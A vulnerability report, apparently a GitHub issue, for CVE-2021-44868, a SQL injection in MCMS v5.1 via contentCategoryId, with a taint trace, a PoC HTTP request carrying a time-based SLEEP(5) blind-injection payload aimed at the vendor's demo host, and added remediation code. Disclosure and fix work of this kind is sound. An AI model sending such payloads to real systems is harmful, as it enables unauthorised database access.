CVE-2021-44868: MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java has a SQL Injection Vulnerability · Issue #58 · ming-soft/MCMS

A problem was found in ming-soft MCMS v5.1. There is a SQL injection vulnerability in /ms/cms/content/list.do.


Vulnerability file:

/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java

Vulnerability tracking path:

1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java, line 72  --The return value of call queryChildren() is tainted
2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java, line 72  --Tainted value is returned
3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 168  --The return value of call queryChildren() is tainted
4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 168  --Tainted value is assigned to variable columns
5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 175  --Tainted value enters call iterator() from the this argument, then taints the return value
6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 175  --Tainted value is assigned to variable column~iterator
7. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 175  --Tainted value enters call next() from the this argument, then taints the return value
8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 175  --Tainted value is assigned to variable column
9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 181  --Tainted value enters call getId() from the this argument, then taints the return value
10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java, line 52  --Tainted variable this.id is returned
11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 181  --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java, line 148  --Tainted value is assigned to variable this.categoryId
13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java, line 183  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java, line 77  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml, line 253  --categoryId

The risk of SQLI type is triggered, caused by the input parameter categoryId, value:
[screenshot in the original issue: the tainted categoryId value]

PoC

POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close

contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'
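The taint path above ends in the MyBatis mapper IContentDao.xml, and the PoC works by closing a quoted string literal, so the sink is SQL text built by substitution rather than a bound parameter. The page does not show the mapper line itself, so the `${categoryId}` form below is an assumption about the root cause; the following is an added illustration, not MCMS code (the class, method and table names are assumed), contrasting the two mapper forms and adding a controller-side check that rejects the PoC value before any DAO call, since a category id should only ever be numeric.

```java
import java.util.List;
import java.util.regex.Pattern;

/**
 * Added illustration for CVE-2021-44868. Not MCMS code; all names are assumed.
 *
 * Assumed vulnerable mapper pattern (string substitution: the value is pasted
 * into the SQL text, so a quote in it ends the literal and the rest is SQL):
 *   <select id="queryIdsByCategoryIdForParser" resultType="long">
 *     SELECT id FROM content_table WHERE category_id = '${categoryId}'
 *   </select>
 *
 * Hardened form (parameter binding: MyBatis sends the value separately from
 * the SQL text as a prepared-statement parameter, so it is never parsed as SQL):
 *   <select id="queryIdsByCategoryIdForParser" resultType="long">
 *     SELECT id FROM content_table WHERE category_id = #{categoryId}
 *   </select>
 *
 * Binding fixes the sink. The check below is defence in depth at the source.
 */
public class CategoryIdGuard {

    // Only a plain decimal id may pass; quotes, operators and whitespace cannot.
    private static final Pattern CATEGORY_ID = Pattern.compile("^\\d{1,18}$");

    /** Returns the parsed id, or throws before the value can reach the DAO. */
    public static long requireCategoryId(String raw) {
        if (raw == null || !CATEGORY_ID.matcher(raw).matches()) {
            throw new IllegalArgumentException("invalid categoryId");
        }
        return Long.parseLong(raw);
    }

    public static void main(String[] args) {
        // Constructed inputs: the first is the payload from the PoC request above.
        List<String> inputs = List.of(
            "158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'",
            "158");
        for (String in : inputs) {
            try {
                System.out.println("accepted: " + requireCategoryId(in));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Running it prints a rejection for the PoC value and `accepted: 158` for the legitimate id; the same pattern can be applied to every id-typed request parameter that the taint path shows flowing into a mapper.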

